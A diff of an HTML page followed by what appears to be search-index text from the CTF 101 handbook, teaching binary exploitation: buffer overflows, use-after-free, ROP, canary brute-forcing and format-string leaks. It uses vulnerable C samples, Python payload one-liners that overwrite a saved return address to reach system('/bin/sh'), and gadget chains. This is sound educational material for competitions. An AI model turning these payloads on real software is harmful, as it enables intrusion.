diff --git a/cryptography/what-are-hashing-functions/index.html b/cryptography/what-are-hashing-functions/index.html index a32d3b10..c9843b52 100644 --- a/cryptography/what-are-hashing-functions/index.html +++ b/cryptography/what-are-hashing-functions/index.html @@ -3259,7 +3259,7 @@
A string hash is a number or string generated using an algorithm that runs on text or data.
The idea is that each hash should be unique to the text or data (although sometimes it isn’t). For example, the hash for “dog” should be different from other hashes.
-You can use command line tools tools or online resources such as this one. +
You can use command line tools or online resources such as this one.
Example:
$ echo -n password | md5
5f4dcc3b5aa765d61d8327deb882cf99
Here, “password” is hashed with different hashing algorithms:
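The same comparison can be sketched in Python. This is a minimal illustration using the standard hashlib module; the choice of algorithms (md5, sha1, sha256) is an assumption made for the example, not a list taken from the original page.

```python
import hashlib

# Hash the same input with several algorithms from the standard library.
data = b'password'
digests = {
    name: hashlib.new(name, data).hexdigest()
    for name in ('md5', 'sha1', 'sha256')
}

for name, digest in digests.items():
    print(name, digest)
```

The md5 line should match the command line output shown above, while the other digests differ in both value and length.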
Capture the Flags, or CTFs, are computer security competitions.
Teams of competitors (or just individuals) are pitted against each other in various challenges across multiple security disciplines, competing to earn the most points.
CTFs are often the beginning of one's cyber security career due to their team building nature and competitive aspect. In addition, there isn't a lot of commitment required beyond a weekend.
Info
For information about ongoing CTFs, check out CTFTime.
In this handbook you'll learn the basics\u2122 behind the methodologies and techniques needed to succeed in Capture the Flag competitions.
"}, {"location": "binary-exploitation/address-space-layout-randomization/", "title": "Address Space Layout Randomization (ASLR)", "text": "Address Space Layout Randomization (or ASLR) is the randomization of the place in memory where the program, shared libraries, the stack, and the heap are. This can make it harder for an attacker to exploit a service, as knowledge about where the stack, heap, or libc is located can't be reused between program launches. This is a partially effective way of preventing an attacker from jumping to, for example, libc without a leak.
Typically, only the stack, heap, and shared libraries are ASLR enabled. It is still somewhat rare for the main program to have ASLR enabled, though it is being seen more frequently and is slowly becoming the default.
"}, {"location": "binary-exploitation/buffer-overflow/", "title": "Buffer Overflow", "text": "A Buffer Overflow is a vulnerability in which data can be written which exceeds the allocated space, allowing an attacker to overwrite other data.
"}, {"location": "binary-exploitation/buffer-overflow/#stack-buffer-overflow", "title": "Stack buffer overflow", "text": "The simplest and most common buffer overflow is one where the buffer is on the stack. Let's look at an example.
#include <stdio.h>\n#include <unistd.h>\n\nint main() {\n int secret = 0xdeadbeef;\n char name[100] = {0};\n read(0, name, 0x100);\n if (secret == 0x1337) {\n puts(\"Wow! Here's a secret.\");\n } else {\n puts(\"I guess you're not cool enough to see my secret\");\n }\n}\n
There's a tiny mistake in this program which will allow us to see the secret. name
is decimal 100 bytes, however we're reading in hex 100 bytes (=256 decimal bytes)! Let's see how we can use this to our advantage.
If the compiler chose to lay out the stack like this:
0xffff006c: 0xf7f7f7f7 // Saved EIP\n 0xffff0068: 0xffff0100 // Saved EBP\n 0xffff0064: 0xdeadbeef // secret\n...\n 0xffff0004: 0x0\nESP -> 0xffff0000: 0x0 // name\n
let's look at what happens when we read in 0x100 bytes of 'A's.
The first decimal 100 bytes are saved properly:
0xffff006c: 0xf7f7f7f7 // Saved EIP\n 0xffff0068: 0xffff0100 // Saved EBP\n 0xffff0064: 0xdeadbeef // secret\n...\n 0xffff0004: 0x41414141\nESP -> 0xffff0000: 0x41414141 // name\n
However when the 101st byte is read in, we see an issue:
0xffff006c: 0xf7f7f7f7 // Saved EIP\n 0xffff0068: 0xffff0100 // Saved EBP\n 0xffff0064: 0xdeadbe41 // secret\n...\n 0xffff0004: 0x41414141\nESP -> 0xffff0000: 0x41414141 // name\n
The least significant byte of secret
has been overwritten! If we follow the next 3 bytes to be read in, we'll see the entirety of secret
is \"clobbered\" with our 'A's
0xffff006c: 0xf7f7f7f7 // Saved EIP\n 0xffff0068: 0xffff0100 // Saved EBP\n 0xffff0064: 0x41414141 // secret\n...\n 0xffff0004: 0x41414141\nESP -> 0xffff0000: 0x41414141 // name\n
The remaining 152 bytes would continue clobbering values up the stack.
"}, {"location": "binary-exploitation/buffer-overflow/#passing-an-impossible-check", "title": "Passing an impossible check", "text": "How can we use this to pass the seemingly impossible check in the original program? Well, if we carefully line up our input so that the bytes that overwrite secret
happen to be the bytes that represent 0x1337 in little-endian, we'll see the secret message.
A small Python one-liner will work nicely: python3 -c \"import sys; sys.stdout.buffer.write(b'A'*100 + b'\\x37\\x13\\x00\\x00')\"
This will fill the name
buffer with 100 'A's, then overwrite secret
with the 32-bit little-endian encoding of 0x1337.
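To make the effect concrete, here is a minimal Python sketch that models only the two locals from the stack diagrams (name followed directly by secret) and applies the payload to them. The names frame, NAME_SIZE and SECRET_OFFSET are hypothetical and exist only for this illustration; a real compiler may lay the variables out differently.

```python
NAME_SIZE = 100        # char name[100]
SECRET_OFFSET = 100    # secret sits directly above name in the diagrams

# Model the two locals as one contiguous region: name, then secret.
frame = bytearray(NAME_SIZE) + (0xdeadbeef).to_bytes(4, 'little')

# 100 filler bytes, then 0x1337 as a 32-bit little-endian value.
payload = b'A' * NAME_SIZE + (0x1337).to_bytes(4, 'little')

# read(0, name, 0x100) copies the input without checking the size of name.
frame[0:len(payload)] = payload

secret = int.from_bytes(frame[SECRET_OFFSET:SECRET_OFFSET + 4], 'little')
print(hex(secret))
```

After the copy, the value read back from the secret slot is 0x1337, which is exactly what the check in the program compares against.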
As discussed on the stack page, the instruction that the current function should jump to when it is done is also saved on the stack (denoted as \"Saved EIP\" in the above stack diagrams). If we can overwrite this, we can control where the program jumps after main
finishes running, giving us the ability to control what the program does entirely.
Usually, the end objective in binary exploitation is to get a shell (often called \"popping a shell\") on the remote computer. The shell provides us with an easy way to run anything we want on the target computer.
Say there happens to be a nice function that does this defined somewhere else in the program that we normally can't get to:
void give_shell() {\n system(\"/bin/sh\");\n}\n
Well with our buffer overflow knowledge, now we can! All we have to do is overwrite the saved EIP on the stack to the address where give_shell
is. Then, when main returns, it will pop that address off of the stack and jump to it, running give_shell
, and giving us our shell.
Assuming give_shell
is at 0x08048fd0, we could use something like this: python3 -c \"import sys; sys.stdout.buffer.write(b'A'*108 + b'\\xd0\\x8f\\x04\\x08')\"
We send 108 'A's to overwrite the 100 bytes that are allocated for name
, the 4 bytes for secret
, and the 4 bytes for the saved EBP. Then we simply send the little-endian form of give_shell
's address, and we would get a shell!
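The same payload can be built with Python's struct module, which avoids writing the little-endian bytes by hand. This is a sketch under the layout assumed in the text (100 bytes of name, 4 of secret, 4 of saved EBP); GIVE_SHELL and PADDING are names chosen for the example.

```python
import struct

GIVE_SHELL = 0x08048fd0    # address assumed in the text above
PADDING = 100 + 4 + 4      # name + secret + saved EBP

# '<I' packs an unsigned 32-bit integer in little-endian byte order.
payload = b'A' * PADDING + struct.pack('<I', GIVE_SHELL)
print(payload[-4:].hex())
```

The last four bytes come out as d0 8f 04 08, the address with its bytes reversed.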
This idea is extended in Return Oriented Programming.
"}, {"location": "binary-exploitation/heap-exploitation/", "title": "Heap Exploits", "text": ""}, {"location": "binary-exploitation/heap-exploitation/#overflow", "title": "Overflow", "text": "Much like a stack buffer overflow, a heap overflow is a vulnerability where more data than can fit in the allocated buffer is read in. This could lead to heap metadata corruption, or corruption of other heap objects, which could in turn provide new attack surface.
"}, {"location": "binary-exploitation/heap-exploitation/#use-after-free-uaf", "title": "Use After Free (UAF)", "text": "Once free
is called on an allocation, the allocator is free to re-allocate that chunk of memory in future calls to malloc
if it so chooses. However if the program author isn't careful and uses the freed object later on, the contents may be corrupt (or even attacker controlled). This is called a use after free or UAF.
#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <string.h>\n\ntypedef struct string {\n unsigned length;\n char *data;\n} string;\n\nint main() {\n struct string* s = malloc(sizeof(string));\n puts(\"Length:\");\n scanf(\"%u\", &s->length);\n s->data = malloc(s->length + 1);\n memset(s->data, 0, s->length + 1);\n puts(\"Data:\");\n read(0, s->data, s->length);\n\n free(s->data);\n free(s);\n\n char *s2 = malloc(16);\n memset(s2, 0, 16);\n puts(\"More data:\");\n read(0, s2, 15);\n\n // Now using s again, a UAF\n\n puts(s->data);\n\n return 0;\n}\n
In this example, we have a string
structure with a length and a pointer to the actual string data. We properly allocate, fill, and then free an instance of this structure. Then we make another allocation, fill it, and then improperly reference the freed string
. Due to how glibc's allocator works, s2
will actually get the same memory as the original s
allocation, which in turn gives us the ability to control the s->data
pointer. This could be used to leak program data.
Not only can the heap be exploited by the data in allocations, but exploits can also use the underlying mechanisms in malloc
, free
, etc. to exploit a program. This is beyond the scope of CTF 101, but here are a few recommended resources:
The No eXecute or the NX bit (also known as Data Execution Prevention or DEP) marks certain areas of the program as not executable, meaning that stored input or data cannot be executed as code. This is significant because it prevents attackers from being able to jump to custom shellcode that they've stored on the stack or in a global variable.
"}, {"location": "binary-exploitation/overview/", "title": "Overview", "text": ""}, {"location": "binary-exploitation/overview/#binary-exploitation", "title": "Binary Exploitation", "text": "Binaries, or executables, are machine code for a computer to execute. For the most part, the binaries that you will face in CTFs are Linux ELF files or the occasional Windows executable. Binary Exploitation is a broad topic within Cyber Security which really comes down to finding a vulnerability in the program and exploiting it to gain control of a shell or modify the program's functions.
Common topics addressed by Binary Exploitation or 'pwn' challenges include:
Relocation Read-Only (or RELRO) is a security measure which makes some binary sections read-only.
There are two RELRO \"modes\": partial and full.
"}, {"location": "binary-exploitation/relocation-read-only/#partial-relro", "title": "Partial RELRO", "text": "Partial RELRO is the default setting in GCC, and nearly all binaries you will see have at least partial RELRO.
From an attacker's point of view, partial RELRO makes almost no difference, other than forcing the GOT to come before the BSS in memory, which eliminates the risk of a buffer overflow on a global variable overwriting GOT entries.
"}, {"location": "binary-exploitation/relocation-read-only/#full-relro", "title": "Full RELRO", "text": "Full RELRO makes the entire GOT read-only which removes the ability to perform a \"GOT overwrite\" attack, where the GOT address of a function is overwritten with the location of another function or a ROP gadget an attacker wants to run.
Full RELRO is not a default compiler setting as it can greatly increase program startup time since all symbols must be resolved before the program is started. In large programs with thousands of symbols that need to be linked, this could cause a noticeable delay in startup time.
"}, {"location": "binary-exploitation/return-oriented-programming/", "title": "Return Oriented Programming", "text": "Return Oriented Programming (or ROP) is the idea of chaining together small snippets of assembly with stack control to cause the program to do more complex things.
As we saw in buffer overflows, having stack control can be very powerful since it allows us to overwrite saved instruction pointers, giving us control over what the program does next. Most programs don't have a convenient give_shell
function however, so we need to find a way to manually invoke system
or another exec
function to get us our shell.
Imagine we have a program similar to the following:
#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nchar name[32];\n\nint main() {\n printf(\"What's your name? \");\n read(0, name, 32);\n\n printf(\"Hi %s\\n\", name);\n\n printf(\"The time is currently \");\n system(\"/bin/date\");\n\n char echo[100];\n printf(\"What do you want me to echo back? \");\n read(0, echo, 1000);\n puts(echo);\n\n return 0;\n}\n
We obviously have a stack buffer overflow on the echo
variable which can give us EIP control when main
returns. But we don't have a give_shell
function! So what can we do?
We can call system
with an argument we control! Since arguments are passed in on the stack in 32-bit Linux programs (see calling conventions), if we have stack control, we have argument control.
When main returns, we want our stack to look like something had normally called system
. Recall what is on the stack after a function has been called:
... // More arguments\n 0xffff0008: 0x00000002 // Argument 2\n 0xffff0004: 0x00000001 // Argument 1\nESP -> 0xffff0000: 0x080484d0 // Return address\n
So main
's stack frame needs to look like this:
0xffff0008: 0xdeadbeef // system argument 1\n 0xffff0004: 0xdeadbeef // return address for system\nESP -> 0xffff0000: 0x08048450 // return address for main (system's PLT entry)\n
Then when main
returns, it will jump into system
's PLT entry and the stack will appear just like system
had been called normally for the first time.
Note: we don't care about the return address system
will return to because we will have already gotten our shell by then!
This is a good start, but we need to pass an argument to system
for anything to happen. As mentioned in the page on ASLR, the stack and dynamic libraries \"move around\" each time a program is run, which means we can't easily use data on the stack or a string in libc for our argument. In this case however, we have a very convenient name
global which will be at a known location in the binary (in the BSS segment).
Our exploit will need to do the following:
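Enter the command we want to run (for example, sh) as name.
Overflow echo with padding up to the saved EIP, followed by:
the address of system's PLT entry,
a placeholder return address for system,
the address of the name global to act as the first argument to system.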
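The two inputs can be sketched in Python as follows. Only SYSTEM_PLT comes from the stack diagram above; NAME_ADDR and OFFSET_TO_EIP are hypothetical placeholders that would have to be read out of the real binary (for example with a disassembler or debugger), and p32 is a small helper defined here for the example.

```python
import struct

SYSTEM_PLT = 0x08048450    # system's PLT entry, taken from the diagram above
NAME_ADDR = 0x0804a040     # hypothetical address of the name global
OFFSET_TO_EIP = 112        # hypothetical distance from echo to the saved EIP

def p32(value):
    # Pack a 32-bit value in little-endian byte order.
    return struct.pack('<I', value)

# First prompt: the command for system to run, NUL-terminated.
name_input = b'sh' + bytes(1)

# Second prompt: padding, then the fake call frame for system.
echo_input = (
    b'A' * OFFSET_TO_EIP
    + p32(SYSTEM_PLT)      # overwrites the saved EIP
    + p32(0xdeadbeef)      # return address for system (we don't care about it)
    + p32(NAME_ADDR)       # first argument to system
)
print(echo_input[OFFSET_TO_EIP:].hex())
```

The three packed values after the padding mirror the three stack slots in the diagram, from the lowest address upward.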
In 64-bit binaries we have to work a bit harder to pass arguments to functions. The basic idea of overwriting the saved RIP is the same, but as discussed in calling conventions, arguments are passed in registers in 64-bit programs. In the case of running system
, this means we will need to find a way to control the RDI register.
To do this, we'll use small snippets of assembly in the binary, called \"gadgets.\" These gadgets usually pop
one or more registers off of the stack, and then execute ret
, which allows us to chain them together by making a large fake call stack.
For example, if we needed control of both RDI and RSI, we might find two gadgets in our program that look like this (using a tool like rp++ or ROPgadget):
0x400c01: pop rdi; ret\n0x400c03: pop rsi; pop r15; ret\n
We can set up a fake call stack with these gadgets to sequentially execute them, pop
ing values we control into registers, and then end with a jump to system
.
0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled\n 0xffff0020: 0x1337beef // value we want in r15 (probably garbage)\n 0xffff0018: 0x1337beef // value we want in rsi\n 0xffff0010: 0x400c03 // address that the rdi gadget's ret will return to - the pop rsi gadget\n 0xffff0008: 0xdeadbeef // value to be popped into rdi\nRSP -> 0xffff0000: 0x400c01 // address of rdi gadget\n
Stepping through this one instruction at a time, main
returns, jumping to our pop rdi
gadget:
RIP = 0x400c01 (pop rdi)\nRDI = UNKNOWN\nRSI = UNKNOWN\n\n 0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled\n 0xffff0020: 0x1337beef // value we want in r15 (probably garbage)\n 0xffff0018: 0x1337beef // value we want in rsi\n 0xffff0010: 0x400c03 // address that the rdi gadget's ret will return to - the pop rsi gadget\nRSP -> 0xffff0008: 0xdeadbeef // value to be popped into rdi\n
pop rdi
is then executed, popping the top of the stack into RDI:
RIP = 0x400c02 (ret)\nRDI = 0xdeadbeef\nRSI = UNKNOWN\n\n 0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled\n 0xffff0020: 0x1337beef // value we want in r15 (probably garbage)\n 0xffff0018: 0x1337beef // value we want in rsi\nRSP -> 0xffff0010: 0x400c03 // address that the rdi gadget's ret will return to - the pop rsi gadget\n
The RDI gadget then ret
s into our RSI gadget:
RIP = 0x400c03 (pop rsi)\nRDI = 0xdeadbeef\nRSI = UNKNOWN\n\n 0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled\n 0xffff0020: 0x1337beef // value we want in r15 (probably garbage)\nRSP -> 0xffff0018: 0x1337beef // value we want in rsi\n
RSI and R15 are popped:
RIP = 0x400c06 (ret)\nRDI = 0xdeadbeef\nRSI = 0x1337beef\n\nRSP -> 0xffff0028: 0x400d00 // where we want the rsi gadget's ret to jump to now that rdi and rsi are controlled\n
And finally, the RSI gadget ret
s, jumping to whatever function we want, but now with RDI and RSI set to values we control.
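The walkthrough above can be replayed with a tiny simulator. This is only a model: GADGETS describes the two gadgets by the registers they pop, and run_chain is a hypothetical helper written for this example, not part of any tool.

```python
# Each gadget lists the registers it pops before its final ret.
GADGETS = {
    0x400c01: ['rdi'],           # pop rdi; ret
    0x400c03: ['rsi', 'r15'],    # pop rsi; pop r15; ret
}

def run_chain(stack):
    regs = {}
    stack = list(stack)          # lowest address first, as RSP moves upward
    rip = stack.pop(0)           # the ret in main pops the first entry
    while rip in GADGETS:
        for reg in GADGETS[rip]:
            regs[reg] = stack.pop(0)   # each pop takes the next stack slot
        rip = stack.pop(0)             # the ret at the end of the gadget
    regs['rip'] = rip
    return regs

chain = [0x400c01, 0xdeadbeef, 0x400c03, 0x1337beef, 0x1337beef, 0x400d00]
state = run_chain(chain)
print({name: hex(value) for name, value in state.items()})
```

The simulation stops once RIP lands on an address that is not a known gadget, which here is 0x400d00 with RDI and RSI holding the values from the fake call stack.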
Stack Canaries are a secret value placed on the stack which changes every time the program is started. Prior to a function return, the stack canary is checked and if it appears to be modified, the program exits immediately.
"}, {"location": "binary-exploitation/stack-canaries/#bypassing-stack-canaries", "title": "Bypassing Stack Canaries", "text": "Stack Canaries seem like a clear cut way to mitigate any stack smashing as it is practically impossible to just guess a random 64-bit value. However, leaking the canary and bruteforcing the canary are two methods which would allow us to get through the canary check.
"}, {"location": "binary-exploitation/stack-canaries/#stack-canary-leaking", "title": "Stack Canary Leaking", "text": "If we can read the data in the stack canary, we can send it back to the program later because the canary stays the same throughout execution. However Linux makes this slightly tricky by making the first byte of the stack canary a NULL, meaning that string functions will stop when they hit it. A method around this would be to partially overwrite and then put the NULL back or find a way to leak bytes at an arbitrary stack offset.
A few situations where you might be able to leak a canary:
The canary is determined when the program starts up for the first time which means that if the program forks, it keeps the same stack cookie in the child process. This means that if the input that can overwrite the canary is sent to the child, we can use whether it crashes as an oracle and brute-force 1 byte at a time!
This method can be used on fork-and-accept servers where connections are spun off to child processes, but only under certain conditions such as when the input accepted by the program does not append a NULL byte (read or recv).
Buffer (N Bytes) ?? ?? ?? ?? ?? ?? ?? ?? RBP RIP
Fill the buffer: N Bytes + 0x00 results in no crash
Buffer (N Bytes) 00 ?? ?? ?? ?? ?? ?? ?? RBP RIP
Fill the buffer: N Bytes + 0x00 + 0x00 results in a crash
N Bytes + 0x00 + 0x01 results in a crash
N Bytes + 0x00 + 0x02 results in a crash
...
N Bytes + 0x00 + 0x51 results in no crash
Buffer (N Bytes) 00 51 ?? ?? ?? ?? ?? ?? RBP RIP
Repeat this bruteforcing process for 6 more bytes...
Buffer (N Bytes) 00 51 FE 0A 31 D2 7B 3C RBP RIP
Now that we have the stack cookie, we can overwrite the saved RIP and take control of the program!
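The byte-at-a-time search can be sketched in Python against a simulated oracle. Everything here is a stand-in: make_oracle plays the role of the forked child (returning True when no crash would be observed), and brute_force is a hypothetical helper; a real exploit would send each guess over the network and watch whether the connection dies.

```python
import os

CANARY_SIZE = 8

def make_oracle(canary):
    # Stand-in for the forked child: True means no crash was observed.
    def survives(guess_prefix):
        return canary[:len(guess_prefix)] == guess_prefix
    return survives

def brute_force(survives):
    known = b''
    for _ in range(CANARY_SIZE):
        for candidate in range(256):
            attempt = known + bytes([candidate])
            if survives(attempt):
                known = attempt      # this byte is correct, move to the next
                break
        else:
            raise RuntimeError('no candidate byte survived')
    return known

# The first byte is NULL, the rest is random, as described above.
secret_canary = bytes(1) + os.urandom(CANARY_SIZE - 1)
recovered = brute_force(make_oracle(secret_canary))
print(recovered.hex())
```

Because each byte is confirmed independently, the search needs at most 8 * 256 = 2048 guesses instead of up to 2^64 for guessing the whole value at once.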
"}, {"location": "binary-exploitation/what-are-buffers/", "title": "Buffers", "text": "A buffer is any allocated space in memory where data (often user input) can be stored. For example, in the following C program name
would be considered a stack buffer:
#include <stdio.h>\n#include <unistd.h>\n\nint main() {\n char name[64] = {0};\n read(0, name, 63);\n printf(\"Hello %s\", name);\n return 0;\n}\n
Buffers could also be global variables:
#include <stdio.h>\n#include <unistd.h>\n\nchar name[64] = {0};\n\nint main() {\n read(0, name, 63);\n printf(\"Hello %s\", name);\n return 0;\n}\n
Or dynamically allocated on the heap:
#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n\nint main() {\n char *name = malloc(64);\n memset(name, 0, 64);\n read(0, name, 63);\n printf(\"Hello %s\", name);\n return 0;\n}\n
"}, {"location": "binary-exploitation/what-are-buffers/#exploits", "title": "Exploits", "text": "Given that buffers commonly hold user input, mistakes when writing to them could result in attacker controlled data being written outside of the buffer's space. See the page on buffer overflows for more.
"}, {"location": "binary-exploitation/what-are-calling-conventions/", "title": "Calling Conventions", "text": "To be able to call functions, there needs to be an agreed-upon way to pass arguments. If a program is entirely self-contained in a binary, the compiler would be free to decide the calling convention. However in reality, shared libraries are used so that common code (e.g. libc) can be stored once and dynamically linked in to programs that need it, reducing program size.
In Linux binaries, there are really only two commonly used calling conventions: cdecl for 32-bit binaries, and SysV for 64-bit binaries.
"}, {"location": "binary-exploitation/what-are-calling-conventions/#cdecl", "title": "cdecl", "text": "In 32-bit binaries on Linux, function arguments are passed in on the stack in reverse order. A function like this:
int add(int a, int b, int c) {\n return a + b + c;\n}\n
would be invoked by pushing c
, then b
, then a
.
For 64-bit binaries, function arguments are first passed in certain registers, in this order: RDI, RSI, RDX, RCX, R8, R9;
then any leftover arguments are pushed onto the stack in reverse order, as in cdecl.
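The difference between the two conventions can be sketched in Python. This is a simplified model that only covers integer and pointer arguments and assumes the System V AMD64 register order RDI, RSI, RDX, RCX, R8, R9; place_arguments is a hypothetical helper for this example.

```python
SYSV_ARG_REGISTERS = ['rdi', 'rsi', 'rdx', 'rcx', 'r8', 'r9']

def place_arguments(args, convention):
    '''Return (registers, pushes); pushes lists values in push order.'''
    if convention == 'cdecl':
        in_registers, on_stack = [], list(args)
    elif convention == 'sysv':
        count = len(SYSV_ARG_REGISTERS)
        in_registers, on_stack = list(args[:count]), list(args[count:])
    else:
        raise ValueError('unknown convention: ' + convention)
    registers = dict(zip(SYSV_ARG_REGISTERS, in_registers))
    pushes = on_stack[::-1]     # stack arguments are pushed in reverse order
    return registers, pushes

print(place_arguments(['a', 'b', 'c'], 'cdecl'))
print(place_arguments([1, 2, 3, 4, 5, 6, 7, 8], 'sysv'))
```

For the add(a, b, c) example, cdecl pushes c, then b, then a, while the 64-bit convention would place all three in registers and push nothing.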
"}, {"location": "binary-exploitation/what-are-calling-conventions/#other-conventions", "title": "Other Conventions", "text": "Any method of passing arguments could be used as long as the compiler is aware of what the convention is. As a result, there have been many calling conventions in the past that aren't used frequently anymore. See Wikipedia for a comprehensive list.
"}, {"location": "binary-exploitation/what-are-registers/", "title": "Registers", "text": "A register is a location within the processor that is able to store data, much like RAM. Unlike RAM however, accesses to registers are effectively instantaneous, whereas reads from main memory can take hundreds of CPU cycles to return.
Registers can hold any value: addresses (pointers), results from mathematical operations, characters, etc. Some registers are reserved however, meaning they have a special purpose and are not \"general purpose registers\" (GPRs). On x86, the only 2 reserved registers are rip
and rsp
which hold the address of the next instruction to execute and the address of the stack respectively.
On x86, the same register can have different sized accesses for backwards compatibility. For example, the rax
register is the full 64-bit register, eax
is the low 32 bits of rax
, ax
is the low 16 bits, al
is the low 8 bits, and ah
is the high 8 bits of ax
(bits 8-15 of rax
).
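The sub-register views are just masks and shifts of the full 64-bit value, which can be illustrated in Python. The value stored in rax here is arbitrary and chosen only so that each byte is easy to recognize.

```python
rax = 0x1122334455667788

eax = rax & 0xffffffff      # low 32 bits
ax = rax & 0xffff           # low 16 bits
al = rax & 0xff             # low 8 bits
ah = (rax >> 8) & 0xff      # bits 8-15, the high byte of ax

for name, value in (('eax', eax), ('ax', ax), ('al', al), ('ah', ah)):
    print(name, hex(value))
```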
A format string vulnerability is a bug where user input is passed as the format argument to printf
, scanf
, or another function in that family.
The format argument has many different specifiers which could allow an attacker to leak data if they control the format argument to printf
. Since printf
and similar are variadic functions, they will continue popping data off of the stack according to the format.
For example, if we can make the format argument \"%x.%x.%x.%x\", printf
will pop off four stack values and print them in hexadecimal, potentially leaking sensitive information.
printf
can also index to an arbitrary \"argument\" with the following syntax: \"%n$x\" (where n
is the decimal index of the argument you want).
While these bugs are powerful, they're rare nowadays, as modern compilers such as GCC and Clang can warn when printf
is called with a non-constant string.
#include <stdio.h>\n#include <unistd.h>\n\nint main() {\n int secret_num = 0x8badf00d;\n\n char name[64] = {0};\n read(0, name, 64);\n printf(\"Hello \");\n printf(name);\n printf(\"! You'll never get my secret!\\n\");\n return 0;\n}\n
Due to how GCC decided to lay out the stack, secret_num
is actually at a lower address on the stack than name
, so we only have to go to the 7th \"argument\" in printf
to leak the secret:
$ ./fmt_string\n%7$llx\nHello 8badf00d3ea43eef\n! You'll never get my secret!\n
"}, {"location": "binary-exploitation/what-is-binary-security/", "title": "Binary Security", "text": "Binary Security is using tools and methods in order to secure programs from being manipulated and exploited. These tools are not infallible, but when used together and implemented properly, they can raise the difficulty of exploitation greatly.
Some methods covered include:
The Global Offset Table (or GOT) is a section inside of programs that holds addresses of functions that are dynamically linked. As mentioned in the page on calling conventions, most programs don't include every function they use to reduce binary size. Instead, common functions (like those in libc) are \"linked\" into the program so they can be saved once on disk and reused by every program.
Unless a program is marked full RELRO, the resolution of functions to addresses in dynamic libraries is done lazily. All dynamic libraries are loaded into memory along with the main program at launch; however, functions are not mapped to their actual code until they're first called. For example, in the following C snippet puts
won't be resolved to an address in libc until after it has been called once:
int main() {\n puts(\"Hi there!\");\n puts(\"Ok bye now.\");\n return 0;\n}\n
To avoid searching through shared libraries each time a function is called, the result of the lookup is saved into the GOT so future function calls \"short circuit\" straight to their implementation bypassing the dynamic resolver.
This has two important implications:
These two facts will become very useful in Return Oriented Programming.
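Lazy resolution with a cached result can be modeled in a few lines of Python. This is a conceptual sketch only: LIBC, got, resolver and call_via_got are hypothetical names, the address is made up, and None stands in for a GOT entry that has not been resolved yet.

```python
LIBC = {'puts': 0xf7e5f140}    # hypothetical resolved address
lookups = []                   # records every slow symbol lookup

def resolver(name):
    # Stand-in for the dynamic linker searching the loaded libraries.
    lookups.append(name)
    return LIBC[name]

got = {'puts': None}           # None: entry not resolved yet

def call_via_got(name):
    if got[name] is None:
        got[name] = resolver(name)   # first call: resolve and cache
    return got[name]                 # later calls: use the cached address

first = call_via_got('puts')
second = call_via_got('puts')
print(hex(first), hex(second), lookups)
```

Both calls end up at the same address, but the lookup list shows the resolver ran only once.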
"}, {"location": "binary-exploitation/what-is-the-got/#plt", "title": "PLT", "text": "Before a function's address has been resolved, the GOT points to an entry in the Procedure Linkage Table (PLT). This is a small \"stub\" function which is responsible for calling the dynamic linker with (effectively) the name of the function that should be resolved.
"}, {"location": "binary-exploitation/what-is-the-heap/", "title": "The Heap", "text": "The heap is a place in memory which a program can use to dynamically create objects. Creating objects on the heap has some advantages compared to using the stack:
There are also some disadvantages however:
In C, there are a number of functions used to interact with the heap, but we're going to focus on the two core ones:
malloc: allocate n bytes on the heap
free: free the given allocation
Let's see how these could be used in a program:
#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n\nint main() {\n unsigned alloc_size = 0;\n char *stuff;\n\n printf(\"Number of bytes? \");\n scanf(\"%u\", &alloc_size);\n\n stuff = malloc(alloc_size + 1);\n memset(stuff, 0, alloc_size + 1);\n\n read(0, stuff, alloc_size);\n\n printf(\"You wrote: %s\", stuff);\n\n free(stuff);\n\n return 0;\n}\n
This program reads in a size from the user, creates an allocation of that size on the heap, reads in that many bytes, then prints it back out to the user.
"}, {"location": "binary-exploitation/what-is-the-stack/", "title": "The Stack", "text": "In computer architecture, the stack is a hardware manifestation of the stack data structure (a Last In, First Out queue).
In x86, the stack is simply an area in RAM that was chosen to be the stack - there is no special hardware to store stack contents. The esp
/rsp
register holds the address in memory where the bottom of the stack resides. When something is push
ed to the stack, esp
decrements by 4 (or 8 on 64-bit x86), and the value that was push
ed is stored at that location in memory. Likewise, when a pop
instruction is executed, the value at esp
is retrieved (i.e. esp
is dereferenced), and esp
is then incremented by 4 (or 8).
N.B. The stack \"grows\" down to lower memory addresses!
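The push and pop behavior described above can be modeled with a small Python class for the 32-bit case. Stack32 is a hypothetical helper for this illustration, and the starting value of esp and the pushed values are arbitrary.

```python
class Stack32:
    def __init__(self, esp):
        self.esp = esp
        self.memory = {}

    def push(self, value):
        self.esp -= 4                   # the stack grows down
        self.memory[self.esp] = value   # store at the new esp

    def pop(self):
        value = self.memory[self.esp]   # dereference esp
        self.esp += 4                   # then move back up
        return value

stack = Stack32(esp=0xffff0008)
stack.push(0xffffa0a0)
stack.push(0x0804845a)
print(hex(stack.esp))
```

After two pushes esp has dropped by 8, and a pop would return the most recently pushed value first.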
Conventionally, ebp
/rbp
contains the address of the top of the current stack frame, and so sometimes local variables are referenced as an offset relative to ebp
rather than an offset to esp
. A stack frame is essentially just the space used on the stack by a given function.
The stack is primarily used for a few things:
Let's see what the stack looks like right after say_hi
has been called in this 32-bit x86 C program:
#include <stdio.h>\n\nvoid say_hi(const char * name) {\n printf(\"Hello %s!\\n\", name);\n}\n\nint main(int argc, char ** argv) {\n char * name;\n if (argc != 2) {\n return 1;\n }\n name = argv[1];\n say_hi(name);\n return 0;\n}\n
And the relevant assembly:
